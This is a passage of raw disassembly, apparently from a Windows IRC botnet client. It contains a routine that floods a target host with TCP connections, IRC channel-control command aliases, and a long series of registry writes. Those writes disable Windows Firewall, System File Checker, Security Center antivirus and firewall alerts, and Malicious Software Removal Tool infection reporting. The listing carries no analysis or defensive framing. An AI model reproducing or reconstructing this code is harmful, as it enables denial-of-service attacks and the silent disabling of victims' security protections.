loc_418913: ; CODE XREF: sub_4181F4+71A�j
call esi ; dword_43716C
push eax
push offset aNd4qzY5xml0rna ; "nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A."
push dword ptr [ebp+var_C+4]
lea eax, [ebp+var_F0]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 18h
loc_418935: ; CODE XREF: sub_4181F4+709�j
cmp [ebp+var_3C], ebx
jz short loc_418964
loc_41893A: ; CODE XREF: sub_4181F4+70E�j
cmp [ebp+var_60], ebx
jz short loc_418944
mov edi, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
loc_418944: ; CODE XREF: sub_4181F4+749�j
call esi ; dword_43716C
push eax
push offset aNd4qzY5xml0rna ; "nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A."
push edi
lea eax, [ebp+var_F0]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_418964: ; CODE XREF: sub_4181F4+2D7�j
; sub_4181F4+5D3�j ...
push [ebp+var_70]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
sub_4181F4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418974 proc near ; CODE XREF: sub_418A0D+DF�p
; sub_418A0D+225�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov edi, [ebp+arg_0]
push dword ptr [edi]
call dword_4372A0 ; gethostbyname
mov esi, eax
test esi, esi
jnz short loc_418992
push 0FFFFFFFEh
pop eax
jmp short loc_418A09
; ---------------------------------------------------------------------------
loc_418992: ; CODE XREF: sub_418974+17�j
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_429690
movsx eax, word ptr [esi+0Ah]
push eax
lea eax, [ebp+var_C]
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
call sub_429350
mov ax, [esi+8]
add esp, 18h
mov [ebp+var_10], ax
push [ebp+arg_4]
call dword_4372C0 ; ntohs
push dword ptr [edi]
mov [ebp+var_E], ax
call sub_41E326
mov [ebp+var_C], eax
pop ecx
movsx eax, [ebp+var_10]
push 0
push 1
push eax
call dword_4372B8 ; socket
mov esi, eax
test esi, esi
jl short loc_418A02
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4372C8 ; connect
test eax, eax
jge short loc_418A07
push esi
call sub_42F0D0
pop ecx
loc_418A02: ; CODE XREF: sub_418974+74�j
or eax, 0FFFFFFFFh
jmp short loc_418A09
; ---------------------------------------------------------------------------
loc_418A07: ; CODE XREF: sub_418974+85�j
mov eax, esi
loc_418A09: ; CODE XREF: sub_418974+1C�j
; sub_418974+91�j
pop edi
pop esi
leave
retn
sub_418974 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A0D proc near ; DATA XREF: sub_40A938+7AD4�o
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 48h
mov esi, eax
pop ecx
lea edi, [ebp+var_13C]
rep movsd
mov esi, dword_437184
mov dword ptr [eax+11Ch], 1
mov eax, [ebp+var_13C]
mov [ebp+var_8], eax
call esi ; dword_437184
mov ecx, [ebp+var_38]
mov [ebp+arg_0], eax
lea eax, [ebp+var_138]
xor ebx, ebx
cmp [ebp+var_24], ebx
mov [ebp+var_14], eax
mov eax, [ebp+var_34]
mov [ebp+var_10], ecx
mov [ebp+var_4], eax
mov edi, offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jnz short loc_418A91
cmp [ebp+var_28], ebx
jnz short loc_418A96
push [ebp+var_30]
push eax
lea eax, [ebp+var_138]
push ecx
push eax
push edi
lea eax, [ebp+var_B8]
push offset aSSendingSDDCon ; "%s -> Sending (%s:%d) (%d) connects(s) "...
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 20h
loc_418A91: ; CODE XREF: sub_418A0D+59�j
cmp [ebp+var_28], ebx
jz short loc_418ABE
loc_418A96: ; CODE XREF: sub_418A0D+5E�j
push [ebp+var_30]
lea eax, [ebp+var_138]
push [ebp+var_34]
push [ebp+var_38]
push eax
push edi
lea eax, [ebp+var_B8]
push offset aSSendingSDDC_0 ; "%s -> Sending (%s:%d) (%d) conn(s) for "...
push eax
push [ebp+var_8]
call sub_41CD0E
add esp, 20h
loc_418ABE: ; CODE XREF: sub_418A0D+87�j
cmp [ebp+var_4], ebx
jnz loc_418BA4
mov [ebp+var_4], ebx
call esi ; dword_437184
sub eax, [ebp+arg_0]
mov edi, 3E8h
xor edx, edx
mov ecx, edi
div ecx
cmp eax, [ebp+var_30]
ja short loc_418B27
mov ebx, dword_43718C
loc_418AE5: ; CODE XREF: sub_418A0D+116�j
push [ebp+var_10]
lea eax, [ebp+var_14]
push eax
call sub_418974
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_418AFB
push edi
jmp short loc_418B13
; ---------------------------------------------------------------------------
loc_418AFB: ; CODE XREF: sub_418A0D+E9�j
mov eax, [ebp+var_4]
mov ecx, 1F4h
cdq
idiv ecx
inc [ebp+var_4]
cmp edx, 1F3h
jnz short loc_418B15
push 0Ah
loc_418B13: ; CODE XREF: sub_418A0D+EC�j
call ebx ; dword_43718C
loc_418B15: ; CODE XREF: sub_418A0D+102�j
call esi ; dword_437184
sub eax, [ebp+arg_0]
xor edx, edx
mov ecx, edi
div ecx
cmp eax, [ebp+var_30]
jbe short loc_418AE5
loc_418B25: ; CODE XREF: sub_418A0D+273�j
; sub_418A0D+287�j
xor ebx, ebx
loc_418B27: ; CODE XREF: sub_418A0D+D0�j
push [ebp+var_2C]
call sub_42355A
cmp [ebp+var_24], ebx
pop ecx
mov edi, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov esi, offset aSSSDSentDConnS ; "%s %s (%s:%d) Sent: (%d) conn(s) for (%"...
jnz short loc_418B6D
cmp [ebp+var_28], ebx
jnz short loc_418B72
push [ebp+var_30]
lea eax, [ebp+var_138]
push [ebp+var_34]
push [ebp+var_38]
push eax
push edi
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 24h
loc_418B6D: ; CODE XREF: sub_418A0D+130�j
cmp [ebp+var_28], ebx
jz short loc_418B9B
loc_418B72: ; CODE XREF: sub_418A0D+135�j
push [ebp+var_30]
lea eax, [ebp+var_138]
push [ebp+var_34]
push [ebp+var_38]
push eax
push edi
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CD0E
add esp, 24h
loc_418B9B: ; CODE XREF: sub_418A0D+163�j
; sub_418A0D+1DC�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_418BA4: ; CODE XREF: sub_418A0D+B4�j
push 4
push [ebp+var_4]
call sub_42B2CA
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_18], eax
mov [ebp+var_C], ebx
jnz short loc_418C01
push [ebp+var_2C]
call sub_42355A
cmp [ebp+var_24], ebx
pop ecx
mov esi, offset aSErrorOutOfMem ; "%s Error: Out Of Mem!"
jnz short loc_418BE6
cmp [ebp+var_28], ebx
jnz short loc_418BEB
push edi
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 10h
loc_418BE6: ; CODE XREF: sub_418A0D+1BE�j
cmp [ebp+var_28], ebx
jz short loc_418B9B
loc_418BEB: ; CODE XREF: sub_418A0D+1C3�j
push edi
lea eax, [ebp+var_B8]
push esi
push eax
push [ebp+var_8]
call sub_41CD0E
add esp, 10h
jmp short loc_418B9B
; ---------------------------------------------------------------------------
loc_418C01: ; CODE XREF: sub_418A0D+1AB�j
call esi ; dword_437184
mov ebx, dword_43718C
mov edi, 3E8h
jmp short loc_418C6B
; ---------------------------------------------------------------------------
loc_418C10: ; CODE XREF: sub_418A0D+26A�j
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [eax+ecx*4]
mov [ebp+var_1C], eax
mov eax, [eax]
test eax, eax
jz short loc_418C46
push eax
call sub_42F0D0
pop ecx
jmp short loc_418C46
; ---------------------------------------------------------------------------
loc_418C2B: ; CODE XREF: sub_418A0D+247�j
push [ebp+var_10]
lea eax, [ebp+var_14]
push eax
call sub_418974
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov ecx, [ebp+var_1C]
mov [ecx], eax
jnz short loc_418C56
push edi
call ebx ; dword_43718C
loc_418C46: ; CODE XREF: sub_418A0D+213�j
; sub_418A0D+21C�j
call esi ; dword_437184
sub eax, [ebp+arg_0]
mov ecx, edi
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
jbe short loc_418C2B
loc_418C56: ; CODE XREF: sub_418A0D+234�j
inc [ebp+var_C]
mov eax, [ebp+var_C]
cmp eax, [ebp+var_4]
jnz short loc_418C69
and [ebp+var_C], 0
push 1
call ebx ; dword_43718C
loc_418C69: ; CODE XREF: sub_418A0D+252�j
call esi ; dword_437184
loc_418C6B: ; CODE XREF: sub_418A0D+201�j
sub eax, [ebp+arg_0]
mov ecx, edi
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
jbe short loc_418C10
mov eax, [ebp+var_C]
inc eax
cmp eax, [ebp+var_4]
jnz loc_418B25
loc_418C86: ; CODE XREF: sub_418A0D+291�j
call esi ; dword_437184
sub eax, [ebp+arg_0]
mov ecx, edi
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
ja loc_418B25
push 1
call ebx ; dword_43718C
jmp short loc_418C86
sub_418A0D endp
; =============== S U B R O U T I N E =======================================
sub_418CA0 proc near ; DATA XREF: .text:0043A008�o
; FUNCTION CHUNK AT 00418CB4 SIZE 0000000C BYTES
call sub_418CAA
jmp loc_418CB4
sub_418CA0 endp
; =============== S U B R O U T I N E =======================================
sub_418CAA proc near ; CODE XREF: sub_418CA0�p
; FUNCTION CHUNK AT 0041C344 SIZE 00000020 BYTES
mov ecx, offset dword_457DFC
jmp loc_41C344
sub_418CAA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418CA0
loc_418CB4: ; CODE XREF: sub_418CA0+5�j
push offset sub_418CC0
call sub_42B799
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_418CA0
; =============== S U B R O U T I N E =======================================
sub_418CC0 proc near ; DATA XREF: sub_418CA0:loc_418CB4�o
; FUNCTION CHUNK AT 0041C364 SIZE 0000000E BYTES
mov ecx, offset dword_457DFC
jmp loc_41C364
sub_418CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418CCA proc near ; CODE XREF: sub_40A938+6B4�p
; sub_418EDB+24E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
mov esi, offset dword_4570A0
mov ebx, 0B8h
loc_418CDE: ; CODE XREF: sub_418CCA+32�j
cmp byte ptr [esi], 0
jz short loc_418D00
push [ebp+arg_0]
push esi
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_418D00
inc [ebp+var_4]
add esi, ebx
cmp esi, offset dword_457C20
jl short loc_418CDE
jmp short loc_418D42
; ---------------------------------------------------------------------------
loc_418D00: ; CODE XREF: sub_418CCA+17�j
; sub_418CCA+25�j
mov esi, [ebp+var_4]
push edi
imul esi, 0B8h
push ebx
push 0
lea edi, dword_4570A0[esi]
push edi
call sub_429690
push 17h
push [ebp+arg_0]
push edi
call sub_429C40
push 9Fh
lea eax, dword_4570B8[esi]
push [ebp+arg_4]
push eax
call sub_429C40
add esp, 24h
inc dword_445D08
pop edi
loc_418D42: ; CODE XREF: sub_418CCA+34�j
mov eax, [ebp+var_4]
pop esi
pop ebx
leave
retn
sub_418CCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418D49 proc near ; CODE XREF: .text:0042C57F�p
var_428 = byte ptr -428h
var_324 = byte ptr -324h
var_220 = byte ptr -220h
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 428h
push ebx
call sub_41729C
call sub_40A708
test eax, eax
jz short loc_418D71
push 1
call sub_427BB8
pop ecx
push 1
call dword_4370C4 ; ExitProcess
loc_418D71: ; CODE XREF: sub_418D49+16�j
xor ebx, ebx
push offset aMessageboxa ; "MessageBoxA"
push offset aUser32_dll ; "user32.dll"
mov [ebp+var_8], 0C8h
mov [ebp+var_7], bl
mov [ebp+var_6], 4
mov [ebp+var_5], bl
mov [ebp+var_4], 60h
call dword_437034 ; LoadLibraryA
push eax
call dword_437030 ; GetProcAddress
lea ecx, [ebp+var_8]
push 5
push ecx
push eax
call sub_42A450
add esp, 0Ch
test eax, eax
jnz short loc_418DB1
loc_418DAF: ; CODE XREF: sub_418D49:loc_418DAF�j
jmp short loc_418DAF
; ---------------------------------------------------------------------------
loc_418DB1: ; CODE XREF: sub_418D49+64�j
push esi
push edi
push dword_445D00
push dword_445D04
call sub_4164D0
pop ecx
pop ecx
call sub_4155B9
push 2
mov [ebp+var_18], offset dword_4439B0
mov [ebp+var_14], offset sub_42207E
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call dword_456FE4 ; SetErrorMode
lea eax, [ebp+var_428]
push 104h
push eax
push ebx
call dword_437070 ; GetModuleHandleA
push eax
call dword_437178 ; GetModuleFileNameA
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_11B]
mov [ebp+var_11C], bl
push ebx
rep stosd
push dword_44398C
stosw
stosb
lea eax, [ebp+var_11C]
push eax
push ebx
call dword_437258
mov esi, dword_4370A4
lea eax, [ebp+var_11C]
push eax
push offset dword_457CF8
call esi ; dword_4370A4
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_324]
push eax
call esi ; dword_4370A4
mov esi, offset dword_443990
lea eax, [ebp+var_324]
push esi
push eax
lea eax, [ebp+var_220]
push offset dword_445D48
push eax
call sub_429A33
lea eax, [ebp+var_324]
push esi
push eax
call sub_4277E9
add esp, 18h
test eax, eax
pop edi
pop esi
jz short loc_418EB9
lea eax, [ebp+var_428]
push 1
push eax
push offset byte_444FF3
push offset dword_444EF4
push dword_444EF0
call sub_421340
lea eax, [ebp+var_220]
push eax
call sub_42211B
add esp, 18h
push 1
call dword_4370C4 ; ExitProcess
loc_418EB9: ; CODE XREF: sub_418D49+139�j
lea eax, [ebp+var_18]
push eax
call dword_456FFC ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_418ED4
lea eax, [ebp+var_220]
push eax
call sub_42211B
pop ecx
loc_418ED4: ; CODE XREF: sub_418D49+17C�j
xor eax, eax
pop ebx
leave
retn 10h
sub_418D49 endp
; =============== S U B R O U T I N E =======================================
sub_418EDB proc near ; DATA XREF: sub_42222E+C�o
; sub_422394+15F�o
var_3B0 = byte ptr -3B0h
var_398 = byte ptr -398h
var_380 = byte ptr -380h
var_374 = qword ptr -374h
var_368 = dword ptr -368h
var_364 = byte ptr -364h
var_358 = qword ptr -358h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_2CC = dword ptr -2CCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
sub esp, 334h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push offset aGx000032 ; "gx000032"
push ebx
push ebx
call dword_4370D0 ; CreateMutexA
mov dword_457F44, eax
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_418F0D
push ebx
call dword_4370C4 ; ExitProcess
loc_418F0D: ; CODE XREF: sub_418EDB+29�j
push offset aNxruj_viib6 ; "nxruJ.vIib6/"
mov edi, offset aSS_1 ; "%s %s"
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push ebx
call sub_4233DE
xor ebp, ebp
inc ebp
push ebp
push offset byte_444FF3
push offset dword_444EF4
push dword_444EF0
call sub_421277
mov esi, eax
add esp, 20h
cmp esi, ebx
jz short loc_418F97
push 80h
push esi
call dword_437068 ; SetFileAttributesA
mov [esp+35Ch+var_348], ebx
jmp short loc_418F74
; ---------------------------------------------------------------------------
loc_418F57: ; CODE XREF: sub_418EDB+A2�j
cmp [esp+35Ch+var_348], 3
jge short loc_418F7F
push esi
call dword_437060 ; DeleteFileA
inc [esp+360h+var_34C]
push 7D0h
call dword_43718C ; Sleep
loc_418F74: ; CODE XREF: sub_418EDB+7A�j
push esi
call sub_4276F7
test eax, eax
pop ecx
jnz short loc_418F57
loc_418F7F: ; CODE XREF: sub_418EDB+81�j
push offset byte_444FF3
push offset dword_444EF4
push dword_444EF0
call sub_420EA3
add esp, 0Ch
loc_418F97: ; CODE XREF: sub_418EDB+68�j
mov esi, dword_437184
call esi ; dword_437184
push eax
call sub_429ABF
pop ecx
lea eax, [esp+364h+var_348]
push eax
call dword_4370C0 ; QueryPerformanceCounter
lea eax, [esp+368h+var_344]
push eax
call dword_4370BC ; QueryPerformanceFrequency
cmp [esp+36Ch+var_34C], ebx
jl short loc_41900C
jg short loc_418FCA
cmp [esp+36Ch+var_350], ebx
jbe short loc_41900C
loc_418FCA: ; CODE XREF: sub_418EDB+E7�j
cmp [esp+36Ch+var_344], ebx
jl short loc_41900C
jg short loc_418FD8
cmp [esp+36Ch+var_348], ebx
jbe short loc_41900C
loc_418FD8: ; CODE XREF: sub_418EDB+F5�j
push [esp+36Ch+var_344]
push [esp+370h+var_348]
push [esp+374h+var_34C]
push [esp+378h+var_350]
call sub_42B220
push ecx
push ecx ; double
mov dword ptr [esp+374h+var_358], eax
mov dword ptr [esp+374h+var_358+4], edx
fild [esp+374h+var_358]
fstp [esp+374h+var_374]
call sub_42A636
pop ecx
pop ecx
call sub_42A910
jmp short loc_41900E
; ---------------------------------------------------------------------------
loc_41900C: ; CODE XREF: sub_418EDB+E5�j
; sub_418EDB+ED�j ...
call esi ; dword_437184
loc_41900E: ; CODE XREF: sub_418EDB+12F�j
mov dword_457E38, eax
lea eax, [esp+36Ch+var_1B8]
push eax
push 202h
call dword_456E58 ; WSAStartup
test eax, eax
jz short loc_419032
push 0FFFFFFFEh
call dword_4370C4 ; ExitProcess
loc_419032: ; CODE XREF: sub_418EDB+14D�j
cmp dword_457014, ebx
jnz short loc_419041
call sub_427AFB
jmp short loc_419052
; ---------------------------------------------------------------------------
loc_419041: ; CODE XREF: sub_418EDB+15D�j
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset dword_6763F8
call sub_429A33
pop ecx
pop ecx
loc_419052: ; CODE XREF: sub_418EDB+164�j
push offset aAqejv_njvii_y8 ; "aQeJV.nJvIi.y8Ri./b5L.q."
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push 5
mov [esp+388h+var_368], ebx
call sub_4233DE
add esp, 10h
mov esi, eax
lea eax, [esp+378h+var_368]
push eax
push ebx
push ebx
push offset sub_41BC58
push ebx
push ebx
call dword_43717C ; CreateThread
imul esi, 2724h
push offset a5gcpxGycn21n1z ; "5GCpx/gYCn21N1Zsj.w3Ty30"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push edi
push 3
mov dword_46D70C[esi], eax
mov [esp+3A0h+var_2CC], ebp
call sub_4233DE
add esp, 10h
mov esi, eax
lea eax, [esp+390h+var_380]
mov edi, dword_43717C
push eax
lea eax, [esp+394h+var_364]
push ebx
push eax
push offset sub_421F40
push ebx
push ebx
call edi ; dword_43717C
imul esi, 2724h
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset dword_446328
push 4
mov dword_46D70C[esi], eax
call sub_4233DE
add esp, 0Ch
mov esi, eax
lea eax, [esp+3A8h+var_398]
push eax
lea eax, [esp+3ACh+var_2B8]
push ebx
push eax
push offset sub_41EB23
push ebx
push ebx
call edi ; dword_43717C
imul esi, 2724h
mov dword_46D70C[esi], eax
call sub_402BA8
push 0B80h
push ebx
push offset dword_4570A0
call sub_429690
push offset aRPrivmsg1GodDa ; "r PRIVMSG $1 god damnit,hard bitchslaps"...
push offset aSlaps ; "slaps"
call sub_418CCA
push offset aRPrivmsg1Slaps ; "r PRIVMSG $1 slaps for You!!"
push offset aSlap ; "slap"
call sub_418CCA
push offset aRPrivmsg1_ ; "r PRIVMSG $1 :."
push offset off_4462B0
call sub_418CCA
push offset aR1_ ; "r $1 :."
push offset aCtc2 ; "ctc2"
call sub_418CCA
push offset aRModeChanO1 ; "r MODE $chan +o $1"
push offset aOps ; "ops"
call sub_418CCA
push offset aRModeChanV1 ; "r MODE $chan +v $1"
push offset aVoice ; "voice"
call sub_418CCA
push offset aRModeChanH1 ; "r MODE $chan +h $1"
push offset aHalfop ; "halfop"
call sub_418CCA
add esp, 44h
push offset aRModeChanB1 ; "r MODE $chan +b $1"
push offset aBan ; "ban"
call sub_418CCA
push ebp
push offset a5000 ; "5000"
push offset aWaittokillserv ; "WaitToKillServiceT"
mov esi, 80000002h
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control"
push esi
call sub_421340
push 0FFFEh
mov edi, offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services\\Tcpip"...
push offset aMaxuserport ; "MaxUserPort"
push edi
push esi
call sub_42131F
push 1Eh
push offset aTcptimedwaitde ; "TcpTimedWaitDelay"
push edi
push esi
call sub_42131F
push ebp
push offset aStricttimewait ; "StrictTimeWaitSeqCheck"
push edi
push esi
call sub_42131F
add esp, 4Ch
push ebp
push offset aTcp1323opts ; "Tcp1323Opts"
push edi
push esi
call sub_42131F
push 3EBC0h
push offset aGlobalmaxtcpwi ; "GlobalMaxTcpWindowSize"
push edi
push esi
call sub_42131F
push 3EBC0h
push offset aTcpwindowsize ; "TcpWindowSize"
push edi
push esi
call sub_42131F
push ebp
push offset aEnablepmtudisc ; "EnablePMTUDiscovery"
push edi
push esi
call sub_42131F
add esp, 40h
push ebx
push offset aEnablepmtubhde ; "EnablePMTUBHDetect"
push edi
push esi
call sub_42131F
push ebp
push offset aSackopts ; "SackOpts"
push edi
push esi
call sub_42131F
push 40h
push offset aDefaultttl ; "DefaultTTL"
push edi
push esi
call sub_42131F
push 2
push offset aTcpmaxdupacks ; "TcpMaxDupAcks"
push edi
push esi
call sub_42131F
add esp, 40h
push 0C8000h
push offset aLargebuffersiz ; "LargeBufferSize"
push edi
push esi
call sub_42131F
push ebp
push offset aAllowuserrawac ; "AllowUserRawAccess"
push edi
push esi
call sub_42131F
push 0FFFFFEh
push offset aTcpnumconnecti ; "TcpNumConnections"
push edi
push esi
call sub_42131F
push ebp
push offset aDisablerawsecu ; "DisableRawSecurity"
push offset aSystemCurren_1 ; "SYSTEM\\CurrentControlSet\\Services\\Afd\\P"...
push esi
call sub_42131F
add esp, 40h
push 0FFFEh
push offset aMaxconnections ; "MaxConnectionsPer1_0Server"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call sub_42131F
push 0FFFEh
push offset aMaxconnectio_0 ; "MaxConnectionsPerServer"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call sub_42131F
push 4000h
push offset aSizreqbuf ; "SizReqBuf"
push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\Lanma"...
push esi
call sub_42131F
push 0FFFFFF9Dh
push offset aSfcdisable ; "SFCDisable"
push offset aSoftwarePolici ; "Software\\Policies\\Microsoft\\Windows NT\\"...
push esi
call sub_42131F
add esp, 40h
push ebx
push offset aSfcscan ; "SFCScan"
push offset aSoftwarePolici ; "Software\\Policies\\Microsoft\\Windows NT\\"...
push esi
call sub_42131F
push ebp
push offset aAutoshareserve ; "AutoShareServer"
push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\Lanma"...
push esi
call sub_42131F
push ebp
push offset aAutosharewks ; "AutoShareWks"
push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\Lanma"...
push esi
call sub_42131F
push ebp
push offset aDevice ; "\\Device\\"
push offset aTransportbindn ; "TransportBindName"
push offset aSystemCurren_3 ; "SYSTEM\\CurrentControlSet\\Services\\NetBT"...
push esi
call sub_421340
add esp, 44h
push ebx
push offset aEnablefirewall ; "EnableFirewall"
push offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_42131F
push ebx
push offset aDonotallowexce ; "DoNotAllowExceptions"
push offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_42131F
push ebp
push offset aDisablenotific ; "DisableNotifications"
push offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_42131F
push ebx
push offset aEnablefirewall ; "EnableFirewall"
push offset aSystemContro_0 ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_42131F
add esp, 40h
push ebx
push offset aDonotallowexce ; "DoNotAllowExceptions"
push offset aSystemContro_0 ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_42131F
push ebp
push offset aDisablenotific ; "DisableNotifications"
push offset aSystemContro_0 ; "SYSTEM\\ControlSet001\\Services\\SharedAcc"...
push esi
call sub_42131F
push ebp
push offset aAntivirusdisab ; "AntiVirusDisableNotify"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_42131F
push ebp
push offset aAntivirusoverr ; "AntiVirusOverride"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_42131F
add esp, 40h
push ebp
push offset aFirewalldisabl ; "FirewallDisableNotify"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_42131F
push ebp
push offset aFirewalloverri ; "FirewallOverride"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Security Center"
push esi
call sub_42131F
push ebp
push offset aDontreportinfe ; "DontReportInfectionInformation"
push offset aSoftwarePoli_0 ; "SOFTWARE\\Policies\\Microsoft\\MRT"
push esi
call sub_42131F
add esp, 30h
call sub_41E8A9
lea eax, [esp+3C0h+var_3B0]
push eax
push ebx
push ebx
push offset sub_41E96A
push ebx
push ebx
call dword_43717C ; CreateThread
push 0FFFFFEh
push offset aTcpnumconnecti ; "TcpNumConnections"
push edi
push esi
call sub_42131F
add esp, 10h
mov esi, offset dword_457E40
push 100h
push esi
call dword_456F2C ; gethostname
push esi
call dword_456FB4 ; gethostbyname
mov dword_457C30, eax
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_456FBC ; inet_ntoa
push 10h
push eax
push offset dword_457CD8
mov dword_457CF0, eax
call sub_429C40
push offset dword_457DFC
mov dword_457CEC, ebx
call sub_420CC8
add esp, 10h
mov esi, offset dword_457DFC
jmp loc_419524
; ---------------------------------------------------------------------------
loc_419496: ; CODE XREF: sub_418EDB+652�j
mov ecx, esi
call sub_41DA9A
test al, al
jnz short loc_4194F6
call sub_427E04
mov eax, dword_457CEC
mov ecx, esi
mov edi, eax
imul eax, 0B8h
add eax, offset byte_443FBF
imul edi, 0B8h
push eax
push 0Ch
push ebp
call sub_41D0BB
push eax
push 4
push 8
mov ecx, esi
call sub_41D0BB
push eax
push 5
push 7
mov ecx, esi
call sub_41D0BB
push eax
lea eax, dword_443F20[edi]
push dword_443FD0[edi]
mov ecx, esi
push eax
call sub_41C7EB
loc_4194F6: ; CODE XREF: sub_418EDB+5C4�j
mov ecx, esi
call sub_41CA64
push 3E8h
call dword_43718C ; Sleep
mov eax, dword_445D00
dec eax
cmp dword_457CEC, eax
jnz short loc_41951E
mov dword_457CEC, ebx
jmp short loc_419524
; ---------------------------------------------------------------------------
loc_41951E: ; CODE XREF: sub_418EDB+639�j
inc dword_457CEC
loc_419524: ; CODE XREF: sub_418EDB+5B6�j
; sub_418EDB+641�j
mov ecx, esi
call sub_41DA9E
test al, al
jnz loc_419496
call sub_4234DB
call dword_456E38 ; WSACleanup
push dword_457F44
call dword_4370CC ; ReleaseMutex
push ebx
call dword_437170 ; ExitThread
sub_418EDB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419551 proc near ; CODE XREF: sub_419797+31�p
; sub_419B88+21�p ...
mov eax, ecx
xor ecx, ecx
mov dword ptr [eax], offset off_437334
mov [eax+4], ecx
mov [eax+0Ch], ecx
mov [eax+8], ecx
retn
sub_419551 endp
; =============== S U B R O U T I N E =======================================
sub_419565 proc near ; DATA XREF: .text:off_437334�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4195C9
test [esp+4+arg_0], 1
jz short loc_41957B
push esi
call sub_429006
pop ecx
